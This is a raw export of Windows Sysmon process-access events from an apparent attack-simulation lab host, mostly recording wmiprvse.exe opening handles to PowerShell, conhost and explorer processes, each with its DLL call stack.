16:54:43.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 